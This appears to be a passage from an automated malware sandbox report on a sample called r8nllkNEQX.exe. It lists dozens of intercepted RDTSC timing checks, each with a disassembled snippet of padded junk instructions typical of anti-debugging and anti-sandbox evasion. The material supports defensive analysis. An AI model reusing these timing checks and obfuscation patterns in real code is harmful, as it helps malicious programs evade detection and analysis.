Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C16478 second address: C16488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C168BB second address: C168F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFB28B74670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FFB28B74673h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007FFB28B74666h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C168F0 second address: C168F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C168F4 second address: C168FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C168FA second address: C16924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A10h 0x0000000d jmp 00007FFB28DE2A12h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1A2AC second address: C1A2B2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1A2B2 second address: C1A2C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A11h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1A2C9 second address: C1A2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1A2CD second address: C1A2D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1C689 second address: C1C68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1C68E second address: C1C6AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFB28DE2A0Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1C6AF second address: C1C6B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1EF07 second address: C1EF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1F06E second address: C1F0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jnc 00007FFB28B7466Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FFB28B74685h 0x00000016 jmp 00007FFB28B74679h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1F0A3 second address: C1F0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1F1FE second address: C1F231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007FFB28B74666h 0x0000000c pop eax 0x0000000d je 00007FFB28B7466Eh 0x00000013 jnl 00007FFB28B74666h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push esi 0x0000001d jmp 00007FFB28B74670h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1F231 second address: C1F235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C28577 second address: C2857F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2857F second address: C28583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C28583 second address: C28587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C26EBF second address: C26ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28DE2A0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C271BF second address: C271CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FFB28B74666h 0x0000000a jo 00007FFB28B74666h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C27352 second address: C27368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28DE2A10h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: BD76B6 second address: BD76BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: BD76BA second address: BD76C4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFB28DE2A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: BD76C4 second address: BD774F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add cx, 6FD1h 0x00000011 mov ebx, dword ptr [ebp+12BE9762h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FFB28B74668h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 and edi, dword ptr [ebp+12A31BE7h] 0x00000037 add eax, ebx 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007FFB28B74668h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 push eax 0x00000054 pushad 0x00000055 jmp 00007FFB28B7466Dh 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: BD774F second address: BD77D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FFB28DE2A08h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov dword ptr [ebp+12A3365Fh], edx 0x00000029 push 00000004h 0x0000002b mov edi, dword ptr [ebp+12A32D5Dh] 0x00000031 sub dh, 00000053h 0x00000034 nop 0x00000035 pushad 0x00000036 pushad 0x00000037 jmp 00007FFB28DE2A15h 0x0000003c jmp 00007FFB28DE2A0Ch 0x00000041 popad 0x00000042 jmp 00007FFB28DE2A16h 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b jno 00007FFB28DE2A06h 0x00000051 push edx 0x00000052 pop edx 0x00000053 popad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: BD77D2 second address: BD77D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C27733 second address: C27739 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C278CC second address: C278D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2C442 second address: C2C44E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BA30 second address: C2BA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BA3B second address: C2BA77 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFB28DE2A06h 0x00000008 jmp 00007FFB28DE2A0Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FFB28DE2A25h 0x00000018 jmp 00007FFB28DE2A19h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BA77 second address: C2BA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jne 00007FFB28B74666h 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BA83 second address: C2BA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFB28DE2A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BA8F second address: C2BA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BC11 second address: C2BC15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BC15 second address: C2BC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BDA5 second address: C2BDC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFB28DE2A13h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jbe 00007FFB28DE2A06h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BDC8 second address: C2BDE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FFB28B74675h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2BDE6 second address: C2BDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2C12A second address: C2C144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74674h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2C144 second address: C2C14E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2FA12 second address: C2FA1C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFB28B74666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C2FB92 second address: C2FB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C389D3 second address: C389D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C389D8 second address: C389EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FFB28DE2A06h 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007FFB28DE2A06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C389EB second address: C38A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FFB28B74666h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFB28B7466Fh 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C38A11 second address: C38A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C36AC2 second address: C36AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFB28B74666h 0x0000000a jmp 00007FFB28B74679h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C36AE9 second address: C36B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFB28DE2A1Fh 0x0000000e jmp 00007FFB28DE2A19h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C36CC1 second address: C36CCB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFB28B74666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C372B4 second address: C372BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C372BB second address: C372C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFB28B74666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C372C7 second address: C372CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C37836 second address: C3784C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74672h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C3784C second address: C3785B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C3785B second address: C37872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74673h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C37872 second address: C3787B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C3787B second address: C37891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFB28B74666h 0x0000000a jmp 00007FFB28B7466Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C37BC9 second address: C37BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C383DA second address: C383E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C383E8 second address: C383F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFB28DE2A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C386B9 second address: C386BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C3D620 second address: C3D645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A15h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FFB28DE2A06h 0x0000000f jne 00007FFB28DE2A06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C3D645 second address: C3D649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C40711 second address: C40715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C40715 second address: C40735 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Bh 0x00000007 jmp 00007FFB28B74671h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C40735 second address: C4075A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28DE2A0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007FFB28DE2A11h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4075A second address: C4075E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C40ED6 second address: C40EF6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007FFB28DE2A06h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FFB28DE2A0Eh 0x00000014 push ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C41055 second address: C41059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C41308 second address: C4131A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C48547 second address: C4854F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4854F second address: C48553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C48835 second address: C4883B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C48AD6 second address: C48ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C48ADC second address: C48AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C48AE5 second address: C48B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jp 00007FFB28DE2A06h 0x0000000c pop edx 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FFB28DE2A0Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C48CA5 second address: C48CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B7466Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C48CB4 second address: C48CCB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFB28DE2A0Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C48CCB second address: C48CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4993A second address: C4994E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007FFB28DE2A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4A01E second address: C4A024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4A024 second address: C4A035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 jng 00007FFB28DE2A06h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4A035 second address: C4A03A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4A03A second address: C4A044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4A044 second address: C4A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFB28B74666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C47EE7 second address: C47EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C47EEB second address: C47EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4DF94 second address: C4DFB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A0Ch 0x0000000d jmp 00007FFB28DE2A0Bh 0x00000012 rdtsc
